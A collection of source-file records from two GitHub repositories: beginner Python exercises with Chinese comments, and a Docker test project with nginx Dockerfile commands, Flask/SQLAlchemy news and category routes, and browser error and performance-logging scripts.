"text": "# 集合的運算\n# 變數名稱 = {值1,值2,值3}\ns1={1,2,3}\ns2={3,4,5}\nprint(3 in s1) # 3在集合裡 T or F\nprint(3 not in s1) # 3不在集合裡 T or F\n\nprint(s1 & s2) # 交集\nprint(s1 | s2) # 聯集\nprint(s1 - s2) # 差集\nprint(s1 ^ s2) # 反交集XOR 連集減交集 (s1|s2)-(s1&s2)\n\ns=set(\"你打我撒~WWWWWWWWWWWWWWWW\") # 把字串中的字母拆解成 Set,重複的只會取一個\nprint(s)\nprint('你' in s)\n\nprint('-------------------------------------')\n\n# 字典的運算\n# Dictionary 字典\n# 變數名稱 = {'鍵':'值'}\ndic={\"apple\":\"蘋果\",'DATA':'資料',\"bug\":\"蟲蟲\"}\nprint(dic)\nprint(dic['apple'])\ndic[\"apple\"]=\"小小小蘋果\" # 更新\nprint(dic['apple'])\ndic['School'] = \"FCU\" # 添加\nprint(dic)\nprint('apple' in dic)\nprint('apple' not in dic)\ndel dic['DATA']\nprint(dic)\n\nprint('-------------------------------------')\n\n# dic={x:x*2 for x in 列表} 從列表的資料產生字典\ndic={x:x*2 for x in [3,4,5]}\nprint(dic)\n\n\n"
},
{
"alpha_fraction": 0.42291128635406494,
"alphanum_fraction": 0.45908698439598083,
"avg_line_length": 20.5,
"blob_id": "91365c771a00fbc883d0b045b31a1a131b644953",
"content_id": "4038762f590795b77ab41130888591d808c7dfe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 54,
"path": "/05.判斷_迴圈.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "###########判斷###########\n# if 條件:\n# 條件成立做這事,不成立往下\n# elif 條件:\n# 條件成立做這事,不成立往下\n# else:\n# 以上條件都不成立做這事\n\nx=input(\"請輸入數字\")\nx=int(x) # 轉型態\nif x>100:\n print(\"超過100\")\nelif x>50:\n print(\"超過50\")\nelse:\n print(\"小於50\")\n\n###########迴圈###########\n# while\n# for\n# while + for OR for + while\n####控制迴圈####\n# break \t 终止迴圈,並且跳出整個迴圈\n# continue 终止當前迴圈,跳出此次迴圈,執行下一次迴圈\n# pass pass是空語句,是為了保持程式结構的完整\n\nnumbers = [12,37,5,42,8,3]\neven = []\nodd = []\nwhile len(numbers) > 0 :\n print(numbers)\n number = numbers.pop()\n if(number % 2 == 0):\n even.append(number)\n print(even)\n print(odd)\n else:\n odd.append(number)\n print(even)\n print(odd)\n\n################################## \nfor numm in range(10,20): # 印出 10 到 20 之间的数字(含頭不含尾)\n print(numm)\n\n##################################\nfor num in range(10,20): # 迭代 10 到 20 之间的数字\n for i in range(2,num): # 根据因子迭代\n if num%i == 0: # 确定第一个因子\n j=num/i # 计算第二个因子\n print ('%d 等于 %d * %d' % (num,i,j))\n break # 跳出当前循环\n else: # 循环的 else 部分\n print (num, '是一个质数')\n"
},
{
"alpha_fraction": 0.5150375962257385,
"alphanum_fraction": 0.5150375962257385,
"avg_line_length": 28.55555534362793,
"blob_id": "18681b9c1473cb684705e1786e920e1b1b216a17",
"content_id": "e698e2bd81f6e05fb4a5ed01993ef86ce13c2f51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 9,
"path": "/自學聖經/08_例外處理.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "while(True):\n try:\n a = int(input('pls intput a number : '))\n b = int(input('pls intput a number : '))\n r = a % b\n except (ValueError,ZeroDivisionError) as err:\n print('find {} error' .format(err))\n else:\n print('r = ',r)\n"
},
{
"alpha_fraction": 0.5483871102333069,
"alphanum_fraction": 0.5967742204666138,
"avg_line_length": 19.66666603088379,
"blob_id": "30f05d4bbd85f8f78133ed4342e0691afa243f8d",
"content_id": "9ababa79ebb532f031b8a432d39c5db6c7841c7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 3,
"path": "/自學聖經/test.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "name = '王小葳'\nheight = 160\nprint('%s 的身高為 %d' % (name,height))\n"
},
{
"alpha_fraction": 0.2526997923851013,
"alphanum_fraction": 0.2958963215351105,
"avg_line_length": 13.5,
"blob_id": "3792b51a4361e38ff97eda12a5146e149caff23d",
"content_id": "ff7adeed033801bec0c83bd6996f329dac972836",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 32,
"path": "/01.DataType.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "#########資料表述#########\n\n# --------------------------------\n# 數字\n1231321\n3.131\n# ---------------------\n# 字串\n\"walala啊哈\"\n'哈哈'\n# ---------------------\n# 布林\nTrue\nFalse\n# ---------------------\n# List 有順序、可動列表\n[3,4,5]\n['hello',\"world\"]\n# ---------------------\n# Tuple 有順序、不可動列表\n(3,4,5)\n('hello',\"world\")\n# ---------------------\n# Set 集合\n{3,4,5}\n{'hello',\"world\"}\n# ---------------------\n# Dictionary 字典\n# {'鍵':'值'}\n{\"apple\":\"蘋果\",'DATA':'資料'}\n# ---------------------\n# 變數"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "c25207d5d215dda9a5709e04e3b15dd1e60d85ce",
"content_id": "35f3db8a0511c112bcee5cad00824a995169be31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 2,
"path": "/自學聖經/README.md",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# Python_practice\n### 練習Python\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.5506072640419006,
"avg_line_length": 19.66666603088379,
"blob_id": "29ed703a41a49da5281f662d5bdf84dc6a23fac5",
"content_id": "acf3f0415b7810d96fdfcf5af9b9c32d7bccdcfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/抽籤.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import random\nimport time\n\npeople = ['a','b','c','d','e','f','g','h','i']\n\nfor i in range(2):\n lucky = random.sample(people,9)\n random.shuffle(people)\n if i < 1:\n print('按造順序1~9份',lucky)\n else:\n print('恭喜你多做一份',people[0])"
},
{
"alpha_fraction": 0.5738636255264282,
"alphanum_fraction": 0.668181836605072,
"avg_line_length": 27.354839324951172,
"blob_id": "037edbd868cdc973f48d9e873b2f2c4f8180d010",
"content_id": "76acc5f52687ae602c2e6f0b1325b1927c4080d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 940,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 31,
"path": "/自學聖經/05_函數與模組.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import math\ndef GetArea(width, height):\n area = width * height\n return area\nsquare_area = GetArea(7,16)\nprint(square_area) #112\n\n# square_area_01 = GetArea(7,16)\n# square_area_02 = GetArea(width = 7,height = 16)\n# square_area_03 = GetArea(height = 16,width = 7)\n# square_area_01 = square_area_02 = square_area_03 # 三者相等\n\n\ndef Circle(ardius):\n area = ardius * ardius * math.pi\n length = ardius * 2 * math.pi\n return area, length\ncircle_area, circumference = Circle(5) # circumference(圓周長)\nprint(circle_area, circumference) # 78.53981633974483 31.41592653589793\nprint(int(circle_area), int(circumference)) # 78, 31\n\n\n\n# 全域變數 & 區域變數\ndef GetArea_01(width, height):\n area = width * height # area 為區域變數\n global aarea # aarea 為全域變數\n aarea = 1\n return area\ngetarea_01 = GetArea_01(7,16) # getarea_01 為全域變數\nprint(getarea_01,\",\", aarea) # 112 , 1\n\n"
}
] | 13 |
enterpriseih/dockertest | https://github.com/enterpriseih/dockertest | d9630bc20893a970c0148633f8f86cba27c2a075 | f05bce55967ecb91a4694a863881f33ecb8ee916 | 1c3c54897139f23357b8a9d7f52feb0af535634d | refs/heads/master | 2023-08-15T20:41:42.318482 | 2021-07-21T05:37:07 | 2021-07-21T05:37:07 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6963979601860046,
"alphanum_fraction": 0.7229845523834229,
"avg_line_length": 32.31428527832031,
"blob_id": "7dc9ccc109e76e93c295dbd8c2920729af1ae331",
"content_id": "dc49ccdae6f3dad1c92fd4bdf6b0f54a95e94852",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1166,
"license_type": "no_license",
"max_line_length": 329,
"num_lines": 35,
"path": "/nginx/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM nginx:1.17.9\n\nMAINTAINER [email protected]\n\nWORKDIR /usr/share/nginx/html\n\nRUN chmod -R 777 /usr/share/nginx/html\nRUN chmod -R 777 /var/log/nginx/\nRUN chmod -R 777 /etc/nginx/conf.d/\n\nEXPOSE 80\n#CMD [\"nginx\",\"-g\",\"daemon off;\"]\n\n\n\n#nginx version: nginx/1.17.9\n\n#/etc/nginx#\n#/etc/nginx/conf.d\n#/var/log/nginx/host.access.log\n#/usr/share/nginx/html\n\n# docker run -it -p 80:80 -v `pwd`/logs:/var/log/nginx dockerfile/nginx\n\n#/git.yonyou.com/docker/nginx\n\n\n\n\n#docker build -t nginx:html .\n# docker run -p 80:80 --name nginx --network testnet -v /git.yonyou.com/docker/nginx/html:/usr/share/nginx/html -v /git.yonyou.com/docker/nginx/log/:/var/log/nginx/ -v /git.yonyou.com/docker/nginx/conf/default.conf:/etc/nginx/conf.d/default.conf -v /git.yonyou.com/docker/nginx/conf/nginx.conf:/etc/nginx/nginx.conf -d nginx:html\n\n# docker run -p 80:80 --name nginx -v /git.yonyou.com/docker/nginx/html:/usr/share/nginx/html -v /git.yonyou.com/docker/nginx/log/:/var/log/nginx/ -v /git.yonyou.com/docker/nginx/conf/default.conf:/etc/nginx/conf.d/default.conf -v /git.yonyou.com/docker/nginx/conf/nginx.conf:/etc/nginx/nginx.conf -d nginx:html\n# docker stop nginx\n# docker start nginx\n"
},
{
"alpha_fraction": 0.5515308976173401,
"alphanum_fraction": 0.5628758668899536,
"avg_line_length": 27.69411849975586,
"blob_id": "3ffdf58bb0f717cd2d419d3b9e6111c1a3a58bc0",
"content_id": "412f33227adbedd15bd02e1a793a5cbf316f4d33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7546,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 255,
"path": "/python/python-web/apps/routers/news.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\nimport random\nfrom ..utils.json import jsonDumps,jsonLoads\nfrom ..model.News import News\nnewsIndex=Blueprint('news_index',__name__)\n\[email protected]('/news')\ndef news_index():\n movies = [\n {'name' : 'My Neighbor Totoro','year':'1988'},\n {'name': 'Three Colours trilogy', 'year': '1993'},\n {'name': 'Forrest Gump', 'year': '1994'},\n {'name': 'Perfect Blue', 'year': '1997'},\n {'name': 'The Matrix', 'year': '1999'},\n {'name': 'Memento', 'year': '2000'},\n {'name': 'The Bucket list', 'year': '2007'},\n {'name': 'Black Swan', 'year': '2010'},\n {'name': 'Gone Girl', 'year': '2014'},\n {'name': 'CoCo', 'year': '2017'}]\n return render_template('news/index.html',data={\"movies\":movies})\n return 'news.index'\n\[email protected]('/news/add')\ndef news_add():\n \"\"\"模拟添加数据\"\"\"\n i = 0\n while True:\n i+=1\n if(i>10):\n break\n news1 = News(title='标题'+str(random.randint(100,1000)),code='编码'+str(random.randint(100,1000)),name=str(i)+'我的名字'+str(random.randint(100,1000)))\n News.add(news1)\n return 'news.add'\[email protected]('/news/count')\ndef news_count():\n '''查询总共有多少条数据'''\n count = News.query.count()\n data = {\n 'data': count,\n 'message': '查询总数成功!',\n 'success': True,\n 'code': 1\n }\n return jsonDumps(data)\n\[email protected]('/news/all')\ndef news_all():\n '''查询所有数据'''\n data = {\n 'data': []\n }\n try:\n queryall = News.query.all()\n for item in queryall:\n data['data'].append({\n 'id': item.id,\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n })\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\n\[email protected]('/news/first')\ndef news_first():\n '''查询第一数据'''\n data = {}\n try:\n item = News.query.first()\n data['data'] = {\n 'id': item.id,\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n }\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\[email protected]('/news/get/<id>',methods=['get','post'])\ndef news_get(id):\n '''查询第一数据'''\n data = {}\n try:\n item = News.query.get(id)\n data['data'] = {\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n }\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\n\n\[email protected]('/news/page')\ndef news_page():\n \"\"\"分页查询, 每页3个, 查询第2页的数据\"\"\"\n data = {\n 'data': []\n }\n # print(len(queryall))\n try:\n page = 1\n per_page = 3\n # queryall = News.query.order_by('id').paginate(page, per_page, error_out=True, max_per_page=None)\n # queryall = News.query.order_by(News.order,News.addtime,News.id.desc()).paginate(page, per_page, error_out=True, max_per_page=None)\n queryall = News.query.filter(News.name.like('%我的名字%'),News.code.like('%1%')).order_by(News.id.asc(),News.order,News.addtime).paginate(page, per_page, error_out=True, max_per_page=None)\n for item in queryall.items:\n data['data'].append({\n 'id': item.id,\n 'newsclassid': item.newsclassid,\n 'title': item.title,\n 'keywork': item.keywork,\n 'description': item.description,\n 'addtime': item.addtime,\n 'updatetime': item.updatetime,\n 'deletetime': item.deletetime,\n 'order': item.order,\n 'code': item.code,\n 'name': item.name,\n 'pinyinname': item.pinyinname,\n 'cnname': item.cnname,\n 'enname': item.enname,\n 'color': item.color,\n 'classname': item.classname,\n 'style': item.style,\n 'link': item.link,\n 'author': item.author,\n 'image': item.image,\n 'smallimage': item.smallimage,\n 'bigimage': item.bigimage,\n 'desc': item.desc,\n 'isdefault': item.isdefault,\n 'ishot': item.ishot,\n 'isstatic': item.isstatic,\n 'isdelete': item.isdelete,\n 'isrecommend': item.isrecommend,\n 'count': item.count,\n })\n except BaseException:\n data['success'] = False \n data['code'] = 0 \n data['message'] = '查询数据失败'\n else:\n data['success'] = True \n data['code'] = 1\n data['message'] = '查询数据成功'\n return jsonDumps(data)\n\n\n# @news.route('/')\n# class News(object):\n# def show():\n# return 'news.show'\n\n# def show():\n# print(news)\n# print(__name__)\n# return 'news.hello'"
},
{
"alpha_fraction": 0.6945898532867432,
"alphanum_fraction": 0.6998254656791687,
"avg_line_length": 26.33333396911621,
"blob_id": "d9a8f6fb3f730bd18b8520f1d9958e531a13d3c0",
"content_id": "70f8ad549fd3915b69acf880978600d9aaeee310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 21,
"path": "/python/python-web/apps/routers/main.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\nfrom .. import app\nfrom flask_sqlalchemy import SQLAlchemy\nfrom ..model.News import News\n# db = SQLAlchemy(app)\nMain=Blueprint('main',__name__)\n# print(dir(News))\[email protected]('/')\ndef main():\n # db = SQLAlchemy()\n # return str(dir(db))\n # db.init_app(app)\n # return str(app.config['SQLALCHEMY_DATABASE_URI'])\n # return dir(SQLAlchemy)\n # return app.config['SQLALCHEMY_DATABASE_URI']\n \n # db = SQLAlchemy(app,use_native_unicode='utf8')\n return render_template('main.html')\n return 'main'"
},
{
"alpha_fraction": 0.7427701950073242,
"alphanum_fraction": 0.745814323425293,
"avg_line_length": 24.230770111083984,
"blob_id": "adf6bcd46204bf27046c1b1bcae6bb2eb68c0e8b",
"content_id": "e6e6baaef3d2c6415003e029dcfebde29dd444e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 657,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 26,
"path": "/python/python-web/apps/routers/__init__.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom .main import Main\nfrom .newsclass import newsClassIndex\nfrom .news import newsIndex\nfrom .user import userIndex\nfrom .data import dataIndex\nfrom .test import testIndex\ndef Router(app):\n app.register_blueprint(Main,url_prefix='/')\n app.register_blueprint(newsIndex)\n app.register_blueprint(userIndex)\n app.register_blueprint(newsClassIndex)\n app.register_blueprint(dataIndex)\n app.register_blueprint(testIndex)\n\n # app.register_blueprint(news_add,url_prefix='/news/add')\n# from flask import Blueprint\n# from .news import News\n\n# n = News()\n# new=Blueprint('news',__name__)\n\n# print(n)\n# @new.route('/')\n# n.show\n\n"
},
{
"alpha_fraction": 0.6329454183578491,
"alphanum_fraction": 0.6365264058113098,
"avg_line_length": 22.27083396911621,
"blob_id": "3b752cd0347289cd8950eca80749a2d996dd2799",
"content_id": "501101830df2d5cd99f1575fb7a60d5d046c6d45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 48,
"path": "/python/python-web/apps/model/Base.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n\nfrom ..database import db\n\nclass Base():\n @staticmethod\n def dropTable():\n db.drop_all()\n @staticmethod\n def createTable():\n db.create_all()\n @staticmethod\n def add(model):\n # try:\n db.session.add(model)\n db.session.commit()\n # except:\n db.session.rollback()\n # return False\n # else:\n # return True\n @staticmethod\n def delete(model):\n try:\n db.session.delete(model)\n db.session.commit()\n except:\n db.session.rollback()\n return False\n else:\n return True\n @staticmethod\n def querall(model):\n return db.session.query(model).filter().all()\n @staticmethod\n def querpage(model,page,per_page):\n max_per_page=None\n error_out=False\n # page 查询的页数\n # per_page 每页的条数\n # max_per_page 每页最大条数,有值时,per_page 受它影响\n # error_out 当值为 True 时,下列情况会报错\n # 当 page 为 1 时,找不到任何数据\n # page 小于 1,或者 per_page 为负数\n # page 或 per_page 不是整数\n # 该方法返回一个分页对象 Pagination\n return db.session.query(model).filter_by().paginate(page=page, per_page=per_page,error_out=error_out, max_per_page=max_per_page)\n"
},
{
"alpha_fraction": 0.6677186489105225,
"alphanum_fraction": 0.6708746552467346,
"avg_line_length": 37.921051025390625,
"blob_id": "5598414eb360d30a5b7b9faf09717e4014d01983",
"content_id": "54cf80ebfc0de66df4584e847b70ae46576e9682",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4444,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 114,
"path": "/python/python-web/apps/routers/newsclass.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template,request\nfrom ..utils.json import jsonDumps,jsonLoads\nfrom ..model.NewsClass import NewsClass\n\n\n\nnewsClassIndex=Blueprint('news_class_index',__name__)\n\[email protected]('/newsclass')\ndef news_class_index():\n all_results = NewsClass.querall(NewsClass)\n print(len(all_results))\n return 'news.class.index'\n\[email protected]('/newsclass/add',methods=['POST','GET'])\ndef news_add():\n # data1 = request.get_data(as_text=True)\n # data2 = request.get_data()\n # data3 = json.loads(data1)\n # print(data1,data2)\n # print(list(data3.keys()))\n data = jsonLoads()\n for item in data['data']:\n newsclass = NewsClass()\n newsclass.title = item['title'] if 'title' in item else None\n newsclass.keywork = item['keywork'] if 'keywork' in item else None\n newsclass.description = item['description'] if 'description' in item else None\n newsclass.addtime = item['addtime'] if 'addtime' in item else None\n newsclass.updatetime = item['updatetime'] if 'updatetime' in item else None\n newsclass.deletetime = item['deletetime'] if 'deletetime' in item else None\n newsclass.order = item['order'] if 'order' in item else None\n newsclass.code = item['code'] if 'code' in item else None\n newsclass.name = item['name'] if 'name' in item else None\n newsclass.pinyinname = item['pinyinname'] if 'pinyinname' in item else None\n newsclass.cnname = item['cnname'] if 'cnname' in item else None\n newsclass.enname = item['enname'] if 'enname' in item else None\n newsclass.color = item['color'] if 'color' in item else None\n newsclass.classname = item['classname'] if 'classname' in item else None\n newsclass.style = item['style'] if 'style' in item else None\n newsclass.link = item['link'] if 'link' in item else None\n newsclass.author = item['author'] if 'author' in item else None\n newsclass.image = item['image'] if 'image' in item else None\n newsclass.smallimage = item['smallimage'] if 'smallimage' in item else None\n newsclass.bigimage = item['bigimage'] if 'bigimage' in item else None\n newsclass.desc = item['desc'] if 'desc' in item else None\n newsclass.isdefault = item['isdefault'] if 'isdefault' in item else None\n newsclass.ishot = item['ishot'] if 'ishot' in item else None\n newsclass.isstatic = item['isstatic'] if 'isstatic' in item else None\n newsclass.isdelete = item['isdelete'] if 'isdelete' in item else None\n newsclass.isrecommend = item['isrecommend'] if 'isrecommend' in item else None\n newsclass.count = item['count'] if 'count' in item else None\n newsclass.pcode = item['pcode'] if 'pcode' in item else None\n # for key in list(item.keys()):\n # nc[key] = item[key]\n NewsClass.add(newsclass)\n # print(item[key])\n # print(item['name'])\n # print(len(data['data']))\n # return \"{}\"\n # for key in list(data3.keys):\n # print(key)\n # print(data3)\n # print(data3.keys)\n # print(json.loads(data2.decode('utf-8')))\n source = {}\n source['list'] = []\n source['success'] = True\n source['message'] = '查询成功'\n alllist = NewsClass.querall(NewsClass)\n for newsclass in alllist:\n source['list'].append({\n 'title': newsclass.title,\n 'keywork': newsclass.keywork,\n 'description': newsclass.description,\n 'addtime': newsclass.addtime,\n 'updatetime': newsclass.updatetime,\n 'deletetime': newsclass.deletetime,\n 'order': newsclass.order,\n 'code': newsclass.code,\n 'name': newsclass.name,\n 'pinyinname': newsclass.pinyinname,\n 'cnname': newsclass.cnname,\n 'enname': newsclass.enname,\n 'color': newsclass.color,\n 'classname': newsclass.classname,\n 'style': newsclass.style,\n 'link': newsclass.link,\n 'author': newsclass.author,\n 'image': newsclass.image,\n 'smallimage': newsclass.smallimage,\n 'bigimage': newsclass.bigimage,\n 'desc': newsclass.desc,\n 'isdefault': newsclass.isdefault,\n 'ishot': newsclass.ishot,\n 'isstatic': newsclass.isstatic,\n 'isdelete': newsclass.isdelete,\n 'isrecommend': newsclass.isrecommend,\n 'count': newsclass.count,\n })\n return jsonDumps(source)\n # return json.dumps(source,ensure_ascii=False, cls=DateEncoder)\n # return 'news.add'\n\n# @news.route('/')\n# class News(object):\n# def show():\n# return 'news.show'\n\n# def show():\n# print(news)\n# print(__name__)\n# return 'news.hello'"
},
{
"alpha_fraction": 0.671480119228363,
"alphanum_fraction": 0.6787003874778748,
"avg_line_length": 33.75,
"blob_id": "7ba4aa71a279a3fec53583fefe3d9ccb07cd68b9",
"content_id": "0eb836e12a846f5ed70f76fef5cbb7e2a049ebaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 8,
"path": "/python/python-web/run.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom apps import app\n# app.config.update(DEBUG=app.config['DEBUG']) \n# app.config.update(HOST=app.config['HOST']) \nif __name__ == '__main__':\n app.run(host=app.config['HOST'],port=app.config['PROT'],debug=app.config['DEBUG'])\n# static_url_path"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6764886379241943,
"avg_line_length": 22.955883026123047,
"blob_id": "caf34beae7d8e9cd30472f0f706bd1150b1511dc",
"content_id": "78dc3efaffc512bf01a56ac0a28ef9770ccac46c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1637,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 68,
"path": "/nginx/html/test/js/a.js",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "\n// window.addEventListener('error',function(...reset){\n// \tconsole.log(reset)\n// },false)\n// window.onerror=function(message,source,lineno,colno,error){\n// \tconsole.log(message,source,lineno,colno,error)\n// }\nwindow.onerror=function(...args){\n\tconsole.log('args',args)\n}\n\nwindow.onunhandledrejection=function(event){\n\tevent = event || window.event\n\tvar errorMsg = \"\"\n\tvar errorStack = \"\"\n\tif(typeof event.reason === 'object'){\n\t\terrorMsg = event.reason.message;\n\t\terrorStack = event.reason.stack;\n\t}else{\n\n\t}\n}\n\nwindow.onload=function(){\n let ziyuan = window.performance.getEntries()\n // console.log(ziyuan)\n let navigationsource = performance.getEntriesByType('navigation')\n // console.log(navigationsource)\n let resourceSource = performance.getEntriesByType('resource')\n // console.log(resourceSource)\n for(var i=0;i<resourceSource.length;i++){\n let name = resourceSource[i].name\n let item = performance.getEntriesByName(name)[0]\n console.log(item)\n console.log(item.toJSON())\n }\n}\n\n\n// performance.mark(\"Begin\");\n// let count=1\n// while(count<500){\n// count++\n// console.log('log')\n// }\n// performance.mark(\"End\");\n// performance.mark(\"Begin\");\n// count=1\n// while(count<500){\n// count++\n// console.log('log')\n// }\n// performance.mark(\"End\");\n// count=1\n// while(count<500){\n// count++\n// console.log('log')\n// }\n// performance.mark(\"End\");\n\n\n\nfunction perf_observer(list, observer) {\n console.log('list, observer',list, observer)\n // Process the \"measure\" event\n // 处理 \"measure\" 事件\n}\nvar observer2 = new PerformanceObserver(perf_observer);\nobserver2.observe({entryTypes: [\"measure\"]});"
},
{
"alpha_fraction": 0.34375,
"alphanum_fraction": 0.59375,
"avg_line_length": 10,
"blob_id": "61e99a9ba0829bb0fb467107148a2faaf4322554",
"content_id": "52f2254a757c3f3e1c1644095f73e02458dfaa4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/nginx/html/test/js/c.js",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "let a = 333\nconst b = 444\nb = 88"
},
{
"alpha_fraction": 0.6174815893173218,
"alphanum_fraction": 0.666810929775238,
"avg_line_length": 24.977527618408203,
"blob_id": "d44f4ae204266e08305e1e3a2a0ca245116deed2",
"content_id": "42b79b84abb2fc0b26565e4f3f0dc896b14ffe53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 2427,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 89,
"path": "/redis/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
